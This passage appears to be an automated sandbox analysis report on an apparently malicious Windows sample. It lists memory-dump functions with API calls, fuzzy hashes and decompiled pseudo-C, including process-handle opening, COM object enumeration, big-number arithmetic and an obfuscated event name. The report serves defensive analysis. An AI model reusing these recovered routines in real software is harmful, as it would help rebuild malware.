                                                                                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850880919-0
                                                                                                                          • Opcode ID: 66c5a96e78e89f146f415ce2dc36ba1243a3f7849b96ae2c562d7f31a2d93d9c
                                                                                                                          • Instruction ID: 2ab07c459f88f2b8ea06cb792186c1e4ac7190dc983220ab6cba4332ff1e67df
                                                                                                                          • Opcode Fuzzy Hash: 66c5a96e78e89f146f415ce2dc36ba1243a3f7849b96ae2c562d7f31a2d93d9c
                                                                                                                          • Instruction Fuzzy Hash: D821EA76901248FFDB11DFE9D984DEEBBB9EF44304B5444AAE601E7200EB34AB45DB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 6E33CEFD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33CF0F
                                                                                                                          • _free.LIBCMT ref: 6E33CF21
                                                                                                                          • _free.LIBCMT ref: 6E33CF33
                                                                                                                          • _free.LIBCMT ref: 6E33CF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction ID: 374d8fbff1916a6e0f96a5ba4a2b14380913039e27eca6cdad3f9715ee7af797
                                                                                                                          • Opcode Fuzzy Hash: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction Fuzzy Hash: B7F06735509AB49BCA40DBE8E480DDB37EDAE05614BB84C09F098DB501CB35F880CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1A24, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD1A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4cdd2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4cdd294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4cdd290 = _t6;
					 *0x4cdd29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4cdd28c = _t7;
					if(_t7 == 0) {
						 *0x4cdd28c =  *0x4cdd28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                          0x04cd1a2c
                                                                                                                          0x04cd1a32
                                                                                                                          0x04cd1a39
                                                                                                                          0x00000000
                                                                                                                          0x04cd1a93
                                                                                                                          0x04cd1a3b
                                                                                                                          0x04cd1a43
                                                                                                                          0x04cd1a50
                                                                                                                          0x04cd1a50
                                                                                                                          0x04cd1a90
                                                                                                                          0x00000000
                                                                                                                          0x04cd1a90
                                                                                                                          0x04cd1a52
                                                                                                                          0x04cd1a52
                                                                                                                          0x04cd1a57
                                                                                                                          0x04cd1a69
                                                                                                                          0x04cd1a6e
                                                                                                                          0x04cd1a74
                                                                                                                          0x04cd1a7a
                                                                                                                          0x04cd1a81
                                                                                                                          0x04cd1a83
                                                                                                                          0x04cd1a83
                                                                                                                          0x00000000
                                                                                                                          0x04cd1a8a
                                                                                                                          0x04cd1a4c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd1a4e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04CD2669,?,?,00000001,?,?,?,04CD1900,?), ref: 04CD1A2C
                                                                                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A3B
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A57
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD1A74
                                                                                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A93
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2270775618-0
                                                                                                                          • Opcode ID: eda39e4813541c9c751b020157b791911f0ba33c6b497ee1a614aec0b5ab04b6
                                                                                                                          • Instruction ID: 57631dbc72809218874a24822510e6be05e98ea095280f60c9e4ee391a650b39
                                                                                                                          • Opcode Fuzzy Hash: eda39e4813541c9c751b020157b791911f0ba33c6b497ee1a614aec0b5ab04b6
                                                                                                                          • Instruction Fuzzy Hash: BCF0447CA82302DBF7208F649D197397B66E704751F08462AE64BCA1C0EB78ED41DF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Smanip$task
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 1925983085-248832578
                                                                                                                          • Opcode ID: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction ID: cf44b3dc242e7f47fdaa131a7a4e514e4c748a57e973c4fabb8eebf212682165
                                                                                                                          • Opcode Fuzzy Hash: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction Fuzzy Hash: 948151B590052CDFCF08CF98CA91FEE77BAFB45304F608999D206A7644D734AA48DB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FDF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2FDF6D
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F681A
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6837
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6854
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6866
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6879
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FDFFA
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FE014
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2939335142-1686923651
                                                                                                                          • Opcode ID: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction ID: a20f9362983d6b8e86c141f3547390a348baead3c7da57a917bd16ac7190b91e
                                                                                                                          • Opcode Fuzzy Hash: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction Fuzzy Hash: C42195B1944B56AFD721CFB5C450B7BBEFDAB08218F040A1EE499C7A41D734D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E306B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 4281374311-1686923651
                                                                                                                          • Opcode ID: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction ID: 62ab6ec2f3b82bfa3bff4b5d46d85ae4e923280f0da55ab25b009383eddcf1eb
                                                                                                                          • Opcode Fuzzy Hash: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction Fuzzy Hash: AD2181B1904A566FDB25CFB5889077BBEECAB08204F040A1AE499C7A41E734D642CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD3273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 04CD32AE
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3393
                                                                                                                            • Part of subcall function 04CD5920: SysAllocString.OLEAUT32(04CDC2B0), ref: 04CD5970
                                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04CD33E6
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD33F5
                                                                                                                            • Part of subcall function 04CD3D39: Sleep.KERNEL32(000001F4), ref: 04CD3D81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3193056040-0
                                                                                                                          • Opcode ID: 62c39d3d539a6e17170d6780bc29abe0572fd95247a232e7c1d54f270af51023
                                                                                                                          • Instruction ID: 47f544af2880dd895d75d6ae9767568c81c020e55d2f954c27f28ce03f7ae307
                                                                                                                          • Opcode Fuzzy Hash: 62c39d3d539a6e17170d6780bc29abe0572fd95247a232e7c1d54f270af51023
                                                                                                                          • Instruction Fuzzy Hash: 12516439500649EFDB01CFA8D944A9EB7B6FF88750F148829EA05DB220DB75FD06CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD5920, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E04CD5920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4cdd2e0; // 0xbda5a8
					_t5 = _t103 + 0x4cde038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4cdc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4cdd2e0; // 0xbda5a8
												_t28 = _t109 + 0x4cde0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4cdd2e0; // 0xbda5a8
														_t33 = _t79 + 0x4cde078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                          0x04cd5925
                                                                                                                          0x04cd592e
                                                                                                                          0x04cd592f
                                                                                                                          0x04cd5933
                                                                                                                          0x04cd5939
                                                                                                                          0x04cd593f
                                                                                                                          0x04cd5948
                                                                                                                          0x04cd594e
                                                                                                                          0x04cd5958
                                                                                                                          0x04cd595a
                                                                                                                          0x04cd5960
                                                                                                                          0x04cd5965
                                                                                                                          0x04cd5970
                                                                                                                          0x04cd5976
                                                                                                                          0x04cd597b
                                                                                                                          0x04cd5a9d
                                                                                                                          0x04cd5981
                                                                                                                          0x04cd5981
                                                                                                                          0x04cd598e
                                                                                                                          0x04cd5994
                                                                                                                          0x04cd599a
                                                                                                                          0x04cd599e
                                                                                                                          0x04cd59a4
                                                                                                                          0x04cd59b1
                                                                                                                          0x04cd59b5
                                                                                                                          0x04cd59bb
                                                                                                                          0x04cd59be
                                                                                                                          0x04cd59c6
                                                                                                                          0x04cd59c7
                                                                                                                          0x04cd59cb
                                                                                                                          0x04cd59cf
                                                                                                                          0x04cd59d2
                                                                                                                          0x04cd59d5
                                                                                                                          0x04cd59db
                                                                                                                          0x04cd59e4
                                                                                                                          0x04cd59ea
                                                                                                                          0x04cd59eb
                                                                                                                          0x04cd59ee
                                                                                                                          0x04cd59ef
                                                                                                                          0x04cd59f0
                                                                                                                          0x04cd59f8
                                                                                                                          0x04cd59f9
                                                                                                                          0x04cd59fa
                                                                                                                          0x04cd59fc
                                                                                                                          0x04cd5a00
                                                                                                                          0x04cd5a04
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd5a0a
                                                                                                                          0x04cd5a13
                                                                                                                          0x04cd5a19
                                                                                                                          0x04cd5a23
                                                                                                                          0x04cd5a27
                                                                                                                          0x04cd5a29
                                                                                                                          0x04cd5a36
                                                                                                                          0x04cd5a3a
                                                                                                                          0x04cd5a42
                                                                                                                          0x04cd5a47
                                                                                                                          0x04cd5a59
                                                                                                                          0x04cd5a5b
                                                                                                                          0x04cd5a61
                                                                                                                          0x04cd5a61
                                                                                                                          0x04cd5a6a
                                                                                                                          0x04cd5a6a
                                                                                                                          0x04cd5a6c
                                                                                                                          0x04cd5a72
                                                                                                                          0x04cd5a72
                                                                                                                          0x04cd5a75
                                                                                                                          0x04cd5a7b
                                                                                                                          0x04cd5a7e
                                                                                                                          0x04cd5a87
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd5a87
                                                                                                                          0x04cd59db
                                                                                                                          0x04cd59d5
                                                                                                                          0x04cd59be
                                                                                                                          0x04cd5a8d
                                                                                                                          0x04cd5a8d
                                                                                                                          0x04cd5a93
                                                                                                                          0x04cd5a93
                                                                                                                          0x04cd5a99
                                                                                                                          0x04cd5a99
                                                                                                                          0x04cd5aa2
                                                                                                                          0x04cd5aa8
                                                                                                                          0x04cd5aa8
                                                                                                                          0x04cd5965
                                                                                                                          0x04cd5ab1

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(04CDC2B0), ref: 04CD5970
                                                                                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04CD5A51
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD5A6A
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04CD5A99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloclstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1885612795-0
                                                                                                                          • Opcode ID: 58ac9d5cc57437ff0e558ec41608bb931eedd748e6a2e38032bbb4da4a4220d4
                                                                                                                          • Instruction ID: cdc69486dad5756b1307273485bab05a662942fb522ca079dbf4d8da36f5ffa8
                                                                                                                          • Opcode Fuzzy Hash: 58ac9d5cc57437ff0e558ec41608bb931eedd748e6a2e38032bbb4da4a4220d4
                                                                                                                          • Instruction Fuzzy Hash: FC512E75D0151AEFCB00DFA8C4889AEF7B6FF89704B148695E915EB250D731AE42CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD7B30, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E04CD7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04CD47C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04CD227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04CD3C06(_t101,  &_v428, _a8, _t96 - _t81);
					E04CD3C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04CD227C(_t101, 0x4cdd168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04CD227C(_a16, _a4);
						E04CD3450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04CDAED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04CDAECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04CD2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04CD3F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04CD2775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4cdd168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                          0x04cd7b33
                                                                                                                          0x04cd7b3f
                                                                                                                          0x04cd7b45
                                                                                                                          0x04cd7b4a
                                                                                                                          0x04cd7b4e
                                                                                                                          0x04cd7cc0
                                                                                                                          0x04cd7cc4
                                                                                                                          0x04cd7cc4
                                                                                                                          0x04cd7b54
                                                                                                                          0x04cd7b58
                                                                                                                          0x04cd7b5c
                                                                                                                          0x04cd7b5f
                                                                                                                          0x04cd7b6a
                                                                                                                          0x04cd7b70
                                                                                                                          0x04cd7b75
                                                                                                                          0x04cd7b78
                                                                                                                          0x04cd7b92
                                                                                                                          0x04cd7ba1
                                                                                                                          0x04cd7bad
                                                                                                                          0x04cd7bb7
                                                                                                                          0x04cd7bbc
                                                                                                                          0x04cd7bbe
                                                                                                                          0x04cd7bc1
                                                                                                                          0x04cd7c78
                                                                                                                          0x04cd7c7e
                                                                                                                          0x04cd7c8f
                                                                                                                          0x04cd7ca2
                                                                                                                          0x04cd7cb8
                                                                                                                          0x00000000
                                                                                                                          0x04cd7cbd
                                                                                                                          0x04cd7bca
                                                                                                                          0x04cd7bd1
                                                                                                                          0x04cd7bd5
                                                                                                                          0x04cd7bdb
                                                                                                                          0x04cd7bdd
                                                                                                                          0x04cd7bdf
                                                                                                                          0x04cd7be1
                                                                                                                          0x04cd7be3
                                                                                                                          0x04cd7bed
                                                                                                                          0x04cd7bf2
                                                                                                                          0x04cd7bf4
                                                                                                                          0x04cd7bf6
                                                                                                                          0x04cd7bf7
                                                                                                                          0x04cd7bf8
                                                                                                                          0x04cd7bf9
                                                                                                                          0x04cd7c00
                                                                                                                          0x04cd7c07
                                                                                                                          0x04cd7c0a
                                                                                                                          0x04cd7c0a
                                                                                                                          0x04cd7bd7
                                                                                                                          0x04cd7bd7
                                                                                                                          0x04cd7bd7
                                                                                                                          0x04cd7c12
                                                                                                                          0x04cd7c1a
                                                                                                                          0x04cd7c26
                                                                                                                          0x04cd7c2b
                                                                                                                          0x04cd7c2b
                                                                                                                          0x04cd7c30
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7c32
                                                                                                                          0x04cd7c35
                                                                                                                          0x04cd7c42
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7c44
                                                                                                                          0x04cd7c44
                                                                                                                          0x04cd7c51
                                                                                                                          0x04cd7c2b
                                                                                                                          0x04cd7c30
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7c30
                                                                                                                          0x04cd7c5b
                                                                                                                          0x04cd7c5e
                                                                                                                          0x04cd7c61
                                                                                                                          0x04cd7c68
                                                                                                                          0x04cd7c68
                                                                                                                          0x04cd7c75
                                                                                                                          0x00000000
                                                                                                                          0x04cd7c75
                                                                                                                          0x04cd7b61
                                                                                                                          0x04cd7b65
                                                                                                                          0x04cd7b66
                                                                                                                          0x04cd7b68
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7b68
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04CD7BE3
                                                                                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04CD7BF9
                                                                                                                          • memset.NTDLL ref: 04CD7CA2
                                                                                                                          • memset.NTDLL ref: 04CD7CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_allmul_aulldiv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3041852380-0
                                                                                                                          • Opcode ID: b9880f77730156ae4feb95242d59bdf783ac15d9115d4c9cbb1d823caa02a8b3
                                                                                                                          • Instruction ID: b4c7af12bea27ccface5478f2676d61b129ee3e7df196fd5ae0aecc0e76cd907
                                                                                                                          • Opcode Fuzzy Hash: b9880f77730156ae4feb95242d59bdf783ac15d9115d4c9cbb1d823caa02a8b3
                                                                                                                          • Instruction Fuzzy Hash: 2A418131A01219BFEF10AF68CC40BEE7776EF45314F104569FA05A7280EB70BA549B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD7CC7, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E04CD7CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4cdd2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4cdd2e0; // 0xbda5a8
				_t3 = _t8 + 0x4cde876; // 0x61636f4c
				_t25 = 0;
				_t30 = E04CD3CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4cdd2e4, 1, 0, _t30);
					E04CD4AAB(_t30);
				}
				_t12 =  *0x4cdd294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04CD4A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
